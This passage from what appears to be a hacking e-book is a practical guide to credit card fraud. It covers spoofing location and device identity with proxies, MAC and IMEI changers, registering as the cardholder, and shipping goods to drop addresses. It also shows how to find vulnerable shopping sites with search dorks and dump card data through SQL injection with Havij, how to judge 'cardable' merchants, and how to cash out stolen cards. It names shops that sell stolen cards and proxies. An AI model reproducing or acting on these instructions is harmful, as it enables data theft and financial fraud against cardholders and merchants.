CARDING PROCESS Create the email id matching with credit card holder name. If his name is John Cena (the random name was taken), then email id should be [email protected] or near about. 1. Now Run RDP and connect to the credit card holder location system to proceed. If you didn’t have RDP, then follow following steps. 2. Open MAC changer and change the address randomly. 3. Run CCleaner and clean all the unwanted data (cookies/history/temp data etc.). 4. Setup SOCKS5 proxy in Firefox. . 5. Be sure to use SOCK5 is matching to the location of credit card holder and be aware not to use blacklisted IP. Check with http://www.check2ip.com 6. Open the site for shopping. I want to recommend a website shop from your country because you don`t need to wait a lot for your package. 7. Register with credit card holder information (John Cena), name, country, city, address, and email. 8. Shop and choose your item and add to cart. Precaution: Select item not more than $500 at first step. 9. In shipping address add your address or drop address where the product is going to deliver. 10. Then go to the payment page and choose payment method like a credit card. 11. Enter all details of credit card manually because most of site having copy paste detector script. 12. Finally, in billing address add credit card owner address info and then proceed with the payment process. 13. If everything all right then the order will get successfully placed. 14. Once the order arrives at the shipping address, receive it from delivery boy. 15. (Few carder arrange fake id if delivery boy ask for proof). Carding method using mobile: Extra pro carder uses mobile for doing carding. If you followed steps carefully, you would also do that. Basic requirement:       

Require rooted Android mobile. Install few application require for carding (proxy apps, CCleaner, IMEI changer, Photo and Android ID changer). You can use any VPN for carding I recommend HMA or Zen mate. You can use SOCKS5 proxy with proxy droid apps. Also, proceed with IMEI and Android ID changer and do it. Now connect with proxy droid with SOCKS5 proxy and connect it. Now follow all the steps explained above

Reference sites:     

CC from shop - www.validcc.su Buy SOCKS from - www.vip72.com Download CCleaner software - www.piriform.com/ccleaner Download MAC address changer - www.zokali.com/win7-mac-addresschanger Download SOCKS checker - www.socksproxychecker.com

PERSONAL ADVICE: CARDING IS ILLEGAL ACTIVITY. DO NOT DO IT. IF GET CAUGHT, THEN, YOU WILL BE IN TROUBLE.

102 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

HOW TO GET FREE CREDIT CARD USING HAVIJ Are you searching for free credit card for carding? Do you want to get a free live CC ? If yes, then you are the right place CARDING? The major problem was cc. They don’t have cc to card, or they don’t know site where they can buy a cc. Today I am going to talk about How you can hack live cc for shopping sites. Did I say from shopping sites? Yes! I said. Do you know that when anyone buys anything from a shopping site, he share is private information with that site like his credit card’s details, his dob etc. Many of sites from those shopping site are vulnerable means that are not protected enough to hide their client details. So today we are using this weakness to hack cc. Hope you get basic idea of this tutorial REQUIREMENTS:    

Havij 1.16 SQLi-DB [size=872kb Carding Dorks [size=8kb] Vulnerable Sites

Let’s divide this tutorial into two part first to find vulnerable sites and second to get data from these sites? HOW TO FIND VULNERABLE SITES ? First we are going to find shopping sites I mean vulnerable site. To find vulnerable sites, you need to use the SQLi-DB and the carding dorks. Let’s do it step by steps. Step 1. Copy one of the dork, i m using inurl:/merchandise/index.php?cat= and paste it in SQLi-DB.

Step 2. Set up the setting and click on the “ scan ” button. This is not high level setting, it is simple choose search engine, duplicate result should be removed or not. Set it yourself.

103 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER Step 3. Once you set it all, start scanning, the result will be shown in the screenshot as below:

Step 4. Click on Vulnerable to filter the result and only show the vulnerable results. Bingo! Boom you completed your first task.

GETTING DATA FROM VULNERABLE SITE: Now, you need to run Havij as administrator and follow the steps below Step 1. Paste the vulnerable site in the target TextBox on Havij and click Analyze . Step 2. Once the process finished, you will see something like in the image below on your Havij log box.

Step 3. Click on Tables then Get Tables and you will see all the tables that are in the database.

104 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER Step 4. Now, look for a table named “ Orders ” or something similar. Tick the table and click on Get Columns.

Step 5. You will get the columns that are in the table “Orders”. Now tick on something that related to credit cards information, such as cc_number, cc_type, cc_expired_year, cc_expired_month, and cvv or cvv2 . Once you’re done, click on Get Data.

Step 6. Just wait for the dumping progress and you will get the information.

Here How to Get Free Live CC. If you follow this all steps respectively i say 99% chances to get free cc for carding

105 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

ARE YOU FINDING A CARDABLE SITE?  



  

What do cardable means? Basically, Cardable site has the following characteristics and how do you determine them easily cardable website: You need to look for on the site’s TOS/POLICY to see if they send to any address and not just the one registered on the card (although you can easily get around this if they don’t, with a COB, photoshopped verification (will go into detail later) or some social engineering over the phone). You need to look for if they have a visa verification code or MasterCard secure code (most of the time if you ask your vendor they’ll include them in your CVV2 details textfile) if they do have one of these you have to put in and you don’t have them then don’t waste your time. If they ship internationally (for obvious reasons, but you can just stick to local websites and order to your local drop, this is the best. If they leave packages at the door when no one’s in, or around the back in a safe area (I know of one site in the UK that has all these qualities including this one, it is perfect for carding clothes) Also, you can’t forget to see what other security checks they need to do (if they need to call you up to verify or want a utility bill, passport, or a scan of the actual CC).

CASHOUT TUTORIAL | PAYPAL - CC – BTC         

Download and open Brave browser If you card from PC or firefox for mobile carders. Sign up bestchange.com Prepare your CC or PayPal ( should be able to access the account ) In the left column head over Online Banking section and select Visa/MasterCard USD or Euro or GBP depends on you card/ PayPal. Select you cashout method.. You can choose Wire USD but you will get about 70% of the amount. (optionally Choose BTC or perfect money then withdraw to your local bank or visa so you get about 90% of the amount) In the Main section choose the first option then follow the link NOW it's important to copy the link you followed then open new tap and paste it where you can change your IP and system time to cc or PayPal ip Put the details and You are ready to go Wait 10 min to 1 hour you will receive the money

106 | P a g e